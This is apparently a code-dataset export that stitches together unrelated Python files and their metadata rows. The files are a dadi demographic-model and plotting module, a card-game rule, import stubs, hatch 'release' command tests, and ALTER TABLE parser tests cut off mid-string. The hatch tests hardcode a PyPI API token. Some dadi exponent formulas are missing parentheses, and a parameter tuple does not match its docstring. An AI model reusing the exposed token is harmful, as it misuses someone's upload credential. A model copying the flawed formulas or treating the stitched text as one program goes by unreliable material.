nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/(T+t_ad1+t_ad2))
nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/(T+t_ad1+t_ad2))
phi = dadi.Integration.two_pops(phi, xx, T, nu1_func, nu2_func,
m12=0, m21=0)
phi = dadi.PhiManip.phi_2D_admix_1_into_2(phi, p_ad1, xx,xx)
nu1_0 = nu1_func(t_ad1)
nu2_0 = nu2_func(t_ad1)
nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/t_ad1+t_ad2)
nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/t_ad1+t_ad2)
phi = dadi.Integration.two_pops(phi, xx, t_ad1, nu1_func, nu2_func,
m12=0, m21=0)
phi = dadi.PhiManip.phi_2D_admix_1_into_2(phi, p_ad2, xx,xx)
nu1_0 = nu1_func(t_ad2)
nu2_0 = nu2_func(t_ad2)
nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/t_ad2)
nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/t_ad2)
phi = dadi.Integration.two_pops(phi, xx, t_ad2, nu1_func, nu2_func,
m12=0, m21=0)
fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##two population model with misorientation
def IM_misorient_noMig_admix(params, ns, pts):
"""
ns = (n1,n2)
params = (nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad,p_ad,p_misid)
Isolation-with-migration model with exponential pop growth.
nu1_0: Size of pop 1 after split.
nu2_0: Size of pop 2 after split.
nu1: Final size of pop 1.
nu2: Final size of pop 2.
T: Time in the past of split (in units of 2*Na generations)
n1,n2: Sample sizes of resulting Spectrum
pts: Number of grid points to use in integration.
"""
nu1_0,nu2_0,nu1,nu2,T,t_ad,p_ad,p_misid = params
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/(T+t_ad))
nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/(T+t_ad))
phi = dadi.Integration.two_pops(phi, xx, T, nu1_func, nu2_func,
m12=0, m21=0)
phi = dadi.PhiManip.phi_2D_admix_1_into_2(phi, p_ad, xx,xx)
nu1_0 = nu1_func(t_ad)
nu2_0 = nu2_func(t_ad)
nu1_func = lambda t: nu1_0 * (nu1/nu1_0)**(t/t_ad)
nu2_func = lambda t: nu2_0 * (nu2/nu2_0)**(t/t_ad)
phi = dadi.Integration.two_pops(phi, xx, t_ad, nu1_func, nu2_func,
m12=0, m21=0)
fs = dadi.Spectrum.from_phi(phi, ns, (xx,xx))
return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
##########################
#######
#### Helper functions
def makeRandomParams(lower,upper):
pNew=numpy.zeros(len(lower))
for i in range(len(lower)):
pNew[i]= numpy.random.uniform(lower[i],upper[i])
return pNew
def plot2file_3d_comp_multinom(model, data, filename,vmin=None, vmax=None,
resid_range=None, fig_num=None,
pop_ids=None, residual='Anscombe', adjust=True):
"""
Multinomial comparison between 3d model and data.
model: 3-dimensional model SFS
data: 3-dimensional data SFS
vmin, vmax: Minimum and maximum values plotted for sfs are vmin and
vmax respectively.
resid_range: Residual plot saturates at +- resid_range.
fig_num: Clear and use figure fig_num for display. If None, an new figure
window is created.
pop_ids: If not None, override pop_ids stored in Spectrum.
residual: 'Anscombe' for Anscombe residuals, which are more normally
distributed for Poisson sampling. 'linear' for the linear
residuals, which can be less biased.
adjust: Should method use automatic 'subplots_adjust'? For advanced
manipulation of plots, it may be useful to make this False.
This comparison is multinomial in that it rescales the model to optimally
fit the data.
"""
model = dadi.Inference.optimally_scaled_sfs(model, data)
plot2file_3d_comp_Poisson(model, data,filename, vmin=vmin, vmax=vmax,
resid_range=resid_range, fig_num=fig_num,
pop_ids=pop_ids, residual=residual,
adjust=adjust)
def plot2file_3d_comp_Poisson(model, data,filename, vmin=None, vmax=None,
resid_range=None, fig_num=None, pop_ids=None,
residual='Anscombe', adjust=True):
"""
Poisson comparison between 3d model and data.
model: 3-dimensional model SFS
data: 3-dimensional data SFS
vmin, vmax: Minimum and maximum values plotted for sfs are vmin and
vmax respectively.
resid_range: Residual plot saturates at +- resid_range.
fig_num: Clear and use figure fig_num for display. If None, an new figure
window is created.
pop_ids: If not None, override pop_ids stored in Spectrum.
residual: 'Anscombe' for Anscombe residuals, which are more normally
distributed for Poisson sampling. 'linear' for the linear
residuals, which can be less biased.
adjust: Should method use automatic 'subplots_adjust'? For advanced
manipulation of plots, it may be useful to make this False.
"""
if data.folded and not model.folded:
model = model.fold()
masked_model, masked_data = dadi.Numerics.intersect_masks(model, data)
if fig_num is None:
f = pylab.gcf()
else:
f = pylab.figure(fig_num, figsize=(8,10))
pylab.clf()
if adjust:
pylab.subplots_adjust(bottom=0.07, left=0.07, top=0.95, right=0.95)
modelmax = max(masked_model.sum(axis=sax).max() for sax in range(3))
datamax = max(masked_data.sum(axis=sax).max() for sax in range(3))
modelmin = min(masked_model.sum(axis=sax).min() for sax in range(3))
datamin = min(masked_data.sum(axis=sax).min() for sax in range(3))
max_toplot = max(modelmax, datamax)
min_toplot = min(modelmin, datamin)
if vmax is None:
vmax = max_toplot
if vmin is None:
vmin = min_toplot
extend = dadi.Plotting._extend_mapping[vmin <= min_toplot, vmax >= max_toplot]
# Calculate the residuals
if residual == 'Anscombe':
resids = [dadi.Inference.\
Anscombe_Poisson_residual(masked_model.sum(axis=2-sax),
masked_data.sum(axis=2-sax),
mask=vmin) for sax in range(3)]
elif residual == 'linear':
resids =[dadi.Inference.\
linear_Poisson_residual(masked_model.sum(axis=2-sax),
masked_data.sum(axis=2-sax),
mask=vmin) for sax in range(3)]
else:
raise ValueError("Unknown class of residual '%s'." % residual)
min_resid = min([r.min() for r in resids])
max_resid = max([r.max() for r in resids])
if resid_range is None:
resid_range = max((abs(max_resid), abs(min_resid)))
resid_extend = dadi.Plotting._extend_mapping[-resid_range <= min_resid,
resid_range >= max_resid]
if pop_ids is not None:
if len(pop_ids) != 3:
raise ValueError('pop_ids must be of length 3.')
data_ids = model_ids = resid_ids = pop_ids
else:
data_ids = masked_data.pop_ids
model_ids = masked_model.pop_ids
if model_ids is None:
model_ids = data_ids
if model_ids == data_ids:
resid_ids = model_ids
else:
resid_ids = None
for sax in range(3):
marg_data = masked_data.sum(axis=2-sax)
marg_model = masked_model.sum(axis=2-sax)
curr_ids = []
for ids in [data_ids, model_ids, resid_ids]:
if ids is None:
ids = ['pop0', 'pop1', 'pop2']
if ids is not None:
ids = list(ids)
del ids[2-sax]
curr_ids.append(ids)
ax = pylab.subplot(4,3,sax+1)
plot_colorbar = (sax == 2)
dadi.Plotting.plot_single_2d_sfs(marg_data, vmin=vmin, vmax=vmax, pop_ids=curr_ids[0],
extend=extend, colorbar=plot_colorbar)
pylab.subplot(4,3,sax+4, sharex=ax, sharey=ax)
dadi.Plotting.plot_single_2d_sfs(marg_model, vmin=vmin, vmax=vmax,
pop_ids=curr_ids[1], extend=extend, colorbar=False)
resid = resids[sax]
pylab.subplot(4,3,sax+7, sharex=ax, sharey=ax)
dadi.Plotting.plot_2d_resid(resid, resid_range, pop_ids=curr_ids[2],
extend=resid_extend, colorbar=plot_colorbar)
ax = pylab.subplot(4,3,sax+10)
flatresid = numpy.compress(numpy.logical_not(resid.mask.ravel()),
resid.ravel())
ax.hist(flatresid, bins=20, normed=True)
ax.set_yticks([])
pylab.savefig(filename, bbox_inches='tight')
################################################
## MS stuff
## and discoal... and msAdmix....
##########
def IM_misorient_admix_core(params):
"""
msAdmix core command for IM_misorient_admix.
"""
nu1_0,nu2_0,nu1,nu2,T,m12,m21,t_ad,p_ad,p_misid = params
alpha1 = numpy.log(nu1/nu1_0)/T
alpha2 = numpy.log(nu2/nu2_0)/T
command = "-n 1 %(nu1)f -n 2 %(nu2)f "\
"-eg 0 1 %(alpha1)f -eg 0 2 %(alpha2)f "\
"-ma x %(m12)f %(m21)f x "\
"-eA %(t_ad)f 2 1 %(p_ad)f "\
"-ej %(T)f 2 1 -en %(T)f 1 1"
sub_dict = {'nu1':nu1, 'nu2':nu2, 'alpha1':2*alpha1, 'alpha2':2*alpha2,
'm12':2*m12, 'm21':2*m21, 'T': T/2, 't_ad':t_ad/2, 'p_ad':p_ad}
return command % sub_dict
def msAdmix_command(theta, ns, core, iter, recomb=0, rsites=None):
"""
Generate ms command for simulation from core.
theta: Assumed theta
ns: Sample sizes
core: Core of ms command that specifies demography.
iter: Iterations to run ms
recomb: Assumed recombination rate
rsites: Sites for recombination. If None, default is 10*theta.
"""
if len(ns) > 1:
ms_command = "msAdmix %(total_chrom)i %(iter)i -t %(theta)f -I %(numpops)i "\
"%(sample_sizes)s %(core)s"
else:
ms_command = "msAdmix %(total_chrom)i %(iter)i -t %(theta)f %(core)s"
if recomb:
ms_command = ms_command + " -r %(recomb)f %(rsites)i"
if not rsites:
rsites = theta*10
sub_dict = {'total_chrom': numpy.sum(ns), 'iter': iter, 'theta': theta,
'numpops': len(ns), 'sample_sizes': ' '.join(map(str, ns)),
'core': core, 'recomb': recomb, 'rsites': rsites}
return ms_command % sub_dict
| 40.219245
| 114
| 0.598425
| 5,265
| 33,020
| 3.558405
| 0.061159
| 0.042968
| 0.047238
| 0.056685
| 0.851241
| 0.84222
| 0.835442
| 0.82957
| 0.818628
| 0.811636
| 0
| 0.063707
| 0.270775
| 33,020
| 820
| 115
| 40.268293
| 0.714357
| 0.014264
| 0
| 0.695122
| 0
| 0.002033
| 0.018839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.00813
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68c72b194660df345e2751a9e96b4cedd4b7eaf9
| 149
|
py
|
Python
|
pyschieber/rules/trumpf_rules.py
|
Murthy10/pyschieber
|
f9db28c9553b8f321f6ed71cff04eff7879af5f6
|
[
"MIT"
] | 5
|
2018-01-17T08:11:14.000Z
|
2018-11-27T11:37:15.000Z
|
pyschieber/rules/trumpf_rules.py
|
Murthy10/pyschieber
|
f9db28c9553b8f321f6ed71cff04eff7879af5f6
|
[
"MIT"
] | 4
|
2018-05-09T08:41:05.000Z
|
2018-11-16T08:07:39.000Z
|
pyschieber/rules/trumpf_rules.py
|
Murthy10/pyschieber
|
f9db28c9553b8f321f6ed71cff04eff7879af5f6
|
[
"MIT"
] | 3
|
2018-04-20T07:39:30.000Z
|
2018-11-10T12:44:08.000Z
|
from pyschieber.trumpf import Trumpf
def trumpf_allowed(chosen_trumpf, geschoben):
return not (chosen_trumpf == Trumpf.SCHIEBEN and geschoben)
| 24.833333
| 63
| 0.798658
| 19
| 149
| 6.105263
| 0.631579
| 0.206897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134228
| 149
| 5
| 64
| 29.8
| 0.899225
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
68e19903599253c1b69975d33efd14fcae8acc44
| 173
|
py
|
Python
|
app/schemas/__init__.py
|
congdh/fastapi-async-realworld
|
608dc6f090f8a02e0a880cef33dca90df78cbfb5
|
[
"MIT"
] | null | null | null |
app/schemas/__init__.py
|
congdh/fastapi-async-realworld
|
608dc6f090f8a02e0a880cef33dca90df78cbfb5
|
[
"MIT"
] | null | null | null |
app/schemas/__init__.py
|
congdh/fastapi-async-realworld
|
608dc6f090f8a02e0a880cef33dca90df78cbfb5
|
[
"MIT"
] | 3
|
2020-10-04T09:37:21.000Z
|
2022-02-13T08:57:35.000Z
|
from .user import * # noqa # isort:skip
from .profile import * # noqa # isort:skip
from .article import * # noqa # isort:skip
from .comment import * # noqa # isort:skip
| 34.6
| 43
| 0.676301
| 24
| 173
| 4.875
| 0.375
| 0.34188
| 0.512821
| 0.649573
| 0.589744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208092
| 173
| 4
| 44
| 43.25
| 0.854015
| 0.387283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
68fb6fca2339f9bd3e3162d438a395b3d8022eda
| 12,828
|
py
|
Python
|
tests/commands/test_release.py
|
williamirick/hatch
|
704cdcd1a0cd3a621235ac9f5b2b90e7524e3cd3
|
[
"Apache-2.0",
"MIT"
] | 2,549
|
2017-09-05T06:44:17.000Z
|
2022-03-31T23:21:02.000Z
|
tests/commands/test_release.py
|
williamirick/hatch
|
704cdcd1a0cd3a621235ac9f5b2b90e7524e3cd3
|
[
"Apache-2.0",
"MIT"
] | 97
|
2017-06-07T23:14:12.000Z
|
2022-03-30T14:22:34.000Z
|
tests/commands/test_release.py
|
williamirick/hatch
|
704cdcd1a0cd3a621235ac9f5b2b90e7524e3cd3
|
[
"Apache-2.0",
"MIT"
] | 140
|
2017-06-10T14:16:47.000Z
|
2022-03-23T09:25:01.000Z
|
import os
from click.testing import CliRunner
from twine.utils import TEST_REPOSITORY
from hatch.cli import hatch
from hatch.env import install_packages
from hatch.settings import SETTINGS_FILE, copy_default_settings, save_settings
from hatch.utils import env_vars, temp_chdir, temp_move_path
from hatch.venv import create_venv, venv
from ..utils import requires_internet
PACKAGE_NAME = 'e00f69943529ccc38058'
USERNAME = '__token__'
PASSWORD = (
'pypi-AgENdGVzdC5weXBpLm9yZwIkZjBlMDRiYzUtOTE3MC00ZDdhLTkzMjMtZjNmMjU2MmJhOGNmAAJFeyJwZXJtaXNzaW9ucyI6IHsicHJvam'
'VjdHMiOiBbImUwMGY2OTk0MzUyOWNjYzM4MDU4Il19LCAidmVyc2lvbiI6IDF9AAAGIEGPIQmW2Gpmi6YbaAzk2lT_26QnavujWgjrIKYVymbt'
)
ENV_VARS = {'TWINE_PASSWORD': PASSWORD}
@requires_internet
def test_cwd():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build'])
os.chdir(os.path.join(d, 'dist'))
with env_vars(ENV_VARS):
result = runner.invoke(hatch, ['release', '-u', USERNAME, '-t'])
assert result.exit_code == 0
@requires_internet
def test_username_env():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build'])
os.chdir(os.path.join(d, 'dist'))
with temp_move_path(SETTINGS_FILE, d):
settings = copy_default_settings()
settings['pypi_username'] = ''
save_settings(settings)
extra_env_vars = {'TWINE_USERNAME': USERNAME, **ENV_VARS}
with env_vars(extra_env_vars):
result = runner.invoke(hatch, ['release', '-t'])
assert result.exit_code == 0
@requires_internet
def test_cwd_dist_exists():
with temp_chdir():
runner = CliRunner()
runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build'])
with env_vars(ENV_VARS):
result = runner.invoke(hatch, ['release', '-u', USERNAME, '-t'])
assert result.exit_code == 0
@requires_internet
def test_package():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
package_dir = os.path.join(d, PACKAGE_NAME)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir, evars=ENV_VARS):
os.chdir(package_dir)
install_packages(['-e', '.'])
os.chdir(d)
result = runner.invoke(hatch, ['release', PACKAGE_NAME, '-u', USERNAME, '-t'])
assert result.exit_code == 0
def test_package_not_exist():
with temp_chdir() as d:
runner = CliRunner()
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir, evars=ENV_VARS):
result = runner.invoke(hatch, ['release', PACKAGE_NAME, '-u', USERNAME, '-t'])
assert result.exit_code == 1
assert '`{}` is not an editable package.'.format(PACKAGE_NAME) in result.output
@requires_internet
def test_local():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
package_dir = os.path.join(d, PACKAGE_NAME)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir, evars=ENV_VARS):
install_packages(['-e', package_dir])
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME, '-t'])
assert result.exit_code == 0
def test_local_not_exist():
with temp_chdir() as d:
runner = CliRunner()
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir):
result = runner.invoke(hatch, ['release', '-l'])
assert result.exit_code == 1
assert 'There are no local packages available.' in result.output
@requires_internet
def test_local_multiple():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', 'ok', '--basic', '-ne'])
runner.invoke(hatch, ['new', 'ko', '--basic', '-ne'])
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir):
install_packages(['-e', os.path.join(d, 'ok')])
install_packages(['-e', os.path.join(d, 'ko')])
result = runner.invoke(hatch, ['release', '-l'])
assert result.exit_code == 1
assert (
'There are multiple local packages available. '
'Select one with the optional argument.'
) in result.output
@requires_internet
def test_path_relative():
with temp_chdir():
runner = CliRunner()
runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build'])
with env_vars(ENV_VARS):
result = runner.invoke(hatch, ['release', '-p', 'dist', '-u', USERNAME, '-t'])
print(result.output)
assert result.exit_code == 0
@requires_internet
def test_path_full():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['new', 'ko', '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
build_dir = os.path.join(d, PACKAGE_NAME, 'dist')
os.chdir(os.path.join(d, 'ko'))
with env_vars(ENV_VARS):
result = runner.invoke(hatch, ['release', '-p', build_dir, '-u', USERNAME, '-t'])
assert result.exit_code == 0
def test_path_full_not_exist():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
full_path = os.path.join(d, 'dist')
result = runner.invoke(hatch, ['release', '-p', full_path])
assert result.exit_code == 1
assert 'Directory `{}` does not exist.'.format(full_path) in result.output
@requires_internet
def test_config_username():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build'])
with temp_move_path(SETTINGS_FILE, d):
settings = copy_default_settings()
settings['pypi_username'] = USERNAME
save_settings(settings)
with env_vars(ENV_VARS):
result = runner.invoke(hatch, ['release', '-p', 'dist', '-t'])
assert result.exit_code == 0
def test_config_not_exist():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build'])
with temp_move_path(SETTINGS_FILE, d):
with env_vars(ENV_VARS):
result = runner.invoke(hatch, ['release', '-p', 'dist', '-t'])
assert result.exit_code == 1
assert 'Unable to locate config file. Try `hatch config --restore`.' in result.output
def test_config_username_empty():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build'])
with temp_move_path(SETTINGS_FILE, d):
settings = copy_default_settings()
settings['pypi_username'] = ''
save_settings(settings)
with env_vars(ENV_VARS):
result = runner.invoke(hatch, ['release', '-p', 'dist', '-t'])
assert result.exit_code == 1
assert (
'A username must be supplied via -u/--username, '
'in {} as pypi_username, or in the TWINE_USERNAME environment variable.'.format(SETTINGS_FILE)
) in result.output
def test_strict():
with temp_chdir():
runner = CliRunner()
runner.invoke(hatch, ['init', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build'])
with env_vars(ENV_VARS):
result = runner.invoke(hatch, ['release', '-p', 'dist', '-u', USERNAME, '-t', '-s'])
assert result.exit_code == 1
def test_repository_local():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
package_dir = os.path.join(d, PACKAGE_NAME)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
# Make sure there's no configuration
with temp_move_path(os.path.expanduser("~/.pypirc"), d):
with venv(venv_dir, evars=ENV_VARS):
install_packages(['-e', package_dir])
# Will error, since there's no configuration parameter for
# this URL
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME, '-r', TEST_REPOSITORY])
assert result.exit_code == 1
@requires_internet
def test_repository_url_local():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
package_dir = os.path.join(d, PACKAGE_NAME)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir, evars=ENV_VARS):
install_packages(['-e', package_dir])
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME,
'--repo-url', TEST_REPOSITORY])
assert result.exit_code == 0
@requires_internet
def test_repository_and_repository_url_local():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
package_dir = os.path.join(d, PACKAGE_NAME)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir, evars=ENV_VARS):
install_packages(['-e', package_dir])
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME,
'--repo', TEST_REPOSITORY,
'--repo-url', TEST_REPOSITORY])
assert result.exit_code == 0
@requires_internet
def test_repository_env_vars():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
package_dir = os.path.join(d, PACKAGE_NAME)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
extra_env_vars = {'TWINE_REPOSITORY': TEST_REPOSITORY, 'TWINE_REPOSITORY_URL': TEST_REPOSITORY, **ENV_VARS}
with venv(venv_dir, evars=extra_env_vars):
install_packages(['-e', package_dir])
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME])
assert result.exit_code == 0
@requires_internet
def test_repository_and_test():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', PACKAGE_NAME, '--basic', '-ne'])
runner.invoke(hatch, ['build', '-p', PACKAGE_NAME])
package_dir = os.path.join(d, PACKAGE_NAME)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir, evars=ENV_VARS):
install_packages(['-e', package_dir])
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME,
'-r', TEST_REPOSITORY,
'-t'])
assert result.exit_code == 1
assert "Cannot specify both --test and --repo." in result.output
with venv(venv_dir, evars=ENV_VARS):
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME,
'--repo-url', TEST_REPOSITORY,
'-t'])
assert result.exit_code == 1
assert "Cannot specify both --test and --repo-url." in result.output
with venv(venv_dir, evars=ENV_VARS):
result = runner.invoke(hatch, ['release', '-l', '-u', USERNAME,
'-r', TEST_REPOSITORY,
'-ru', TEST_REPOSITORY,
'-t'])
assert result.exit_code == 1
assert "Cannot specify both --test and --repo." in result.output
assert "Cannot specify both --test and --repo-url." in result.output
| 34.299465
| 117
| 0.585672
| 1,514
| 12,828
| 4.758256
| 0.086526
| 0.096613
| 0.136868
| 0.036646
| 0.807607
| 0.778179
| 0.764853
| 0.737507
| 0.72543
| 0.70794
| 0
| 0.006297
| 0.269645
| 12,828
| 373
| 118
| 34.391421
| 0.762621
| 0.007795
| 0
| 0.742754
| 0
| 0
| 0.12944
| 0.017369
| 0
| 0
| 0
| 0
| 0.115942
| 1
| 0.072464
| false
| 0.007246
| 0.032609
| 0
| 0.105072
| 0.003623
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b9d5d686bba19a7de897542b5459a77db5468f6
| 59
|
py
|
Python
|
tirelire-account/app/views/__init__.py
|
AgRenaud/tirelire
|
0ac42dbf735dea4ecb741057bd037c18657b95c7
|
[
"MIT"
] | null | null | null |
tirelire-account/app/views/__init__.py
|
AgRenaud/tirelire
|
0ac42dbf735dea4ecb741057bd037c18657b95c7
|
[
"MIT"
] | null | null | null |
tirelire-account/app/views/__init__.py
|
AgRenaud/tirelire
|
0ac42dbf735dea4ecb741057bd037c18657b95c7
|
[
"MIT"
] | null | null | null |
from app.views import account
from app.views import holder
| 19.666667
| 29
| 0.830508
| 10
| 59
| 4.9
| 0.6
| 0.285714
| 0.489796
| 0.734694
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135593
| 59
| 2
| 30
| 29.5
| 0.960784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d419364f78c2d3e6bb683c7ba961f357ffe25afa
| 25,433
|
py
|
Python
|
tests/grammar/test_alter_table.py
|
Daniihh/sqlpyparser
|
aad1d613c02d4f8fa6b833c060a683cf7e194b1c
|
[
"MIT"
] | 28
|
2016-02-13T10:20:21.000Z
|
2022-03-10T02:41:58.000Z
|
tests/grammar/test_alter_table.py
|
Daniihh/sqlpyparser
|
aad1d613c02d4f8fa6b833c060a683cf7e194b1c
|
[
"MIT"
] | 22
|
2016-02-15T15:55:09.000Z
|
2017-09-12T13:49:17.000Z
|
tests/grammar/test_alter_table.py
|
Daniihh/sqlpyparser
|
aad1d613c02d4f8fa6b833c060a683cf7e194b1c
|
[
"MIT"
] | 16
|
2016-02-15T16:41:23.000Z
|
2021-05-18T04:51:52.000Z
|
# -*- encoding:utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
from mysqlparse.grammar.alter_table import alter_table_syntax
class AlterTableAddColumnSyntaxTest(unittest.TestCase):
def test_alter_table_add(self):
statement = alter_table_syntax.parseString("""
ALTER IGNORE TABLE test_test ADD col_no0 BIT(8) NOT NULL DEFAULT 0 FIRST,
ADD col_no1 LONGTEXT NOT NULL,
ADD col_no2 VARCHAR(200) NULL,
ADD col_no3 BIT(8) AFTER col0;
""")
self.assertTrue(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col_no0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col_no1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col_no2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col_no3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
def test_alter_table_add_column(self):
statement = alter_table_syntax.parseString("""
ALTER TABLE test_test ADD COLUMN col0 BIT(8) NOT NULL DEFAULT 0 FIRST,
ADD COLUMN col1 LONGTEXT NOT NULL,
ADD COLUMN col2 VARCHAR(200) NULL,
ADD COLUMN col3 BIT(8) AFTER col0;
""")
self.assertFalse(statement.ignore)
self.assertEqual(statement.statement_type, 'ALTER')
self.assertEqual(statement.table_name, 'test_test')
self.assertEqual(statement.alter_specification[0].column_name, 'col0')
self.assertEqual(statement.alter_specification[0].column_position, 'FIRST')
self.assertEqual(statement.alter_specification[1].column_name, 'col1')
self.assertEqual(statement.alter_specification[1].column_position, 'LAST')
self.assertEqual(statement.alter_specification[2].column_name, 'col2')
self.assertEqual(statement.alter_specification[2].column_position, 'LAST')
self.assertEqual(statement.alter_specification[3].column_name, 'col3')
self.assertEqual(statement.alter_specification[3].column_position, 'col0')
def test_alter_table_add_column_mixed(self):
statement = alter_table_syntax.parseString("""
